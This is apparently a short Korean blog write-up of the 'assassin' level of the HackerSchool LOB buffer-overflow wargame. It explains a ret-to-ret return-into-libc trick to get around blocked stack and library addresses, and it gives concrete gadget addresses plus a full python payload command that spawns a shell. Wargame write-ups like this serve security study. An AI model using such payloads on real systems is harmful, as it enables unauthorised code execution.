소스를 본다
보니까
스택이랑 공유라이브러리 주소를 사용하지 못한다.
제길 도저히 모르겠어서 검색했다.
코드 마지막에 있는 ret을 리턴주소에다가 넣어서 pop eip를 한번 하면 스택이 4바이트 만큼 올라가서
다음 4바이트로 리턴을 사용할 수 있다고 한다.
그럼 페이로드는
NOP*44 + &ret + &system + NOP*$ + &/bin/sh
ret : 0x804851e
system : 0x40058ae0
exit : 0x400391e0
&/bin/sh : 0x400fbff9
./assassin `python -c 'print "\x90"*44+"\x1e\x85\x04\x08"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"'`
'WarGame > HackerSchool_LOB' 카테고리의 다른 글
| HackerSchool LOB Level17 (0) | 2014.08.24 |
|---|---|
| HackerSchool LOB Level16 (0) | 2014.08.23 |
| HackerSchool LOB Level14 (0) | 2014.08.20 |
| HackerSchool LOB Level13 (0) | 2014.08.15 |
| HackerSchool LOB Level12 (0) | 2014.07.31 |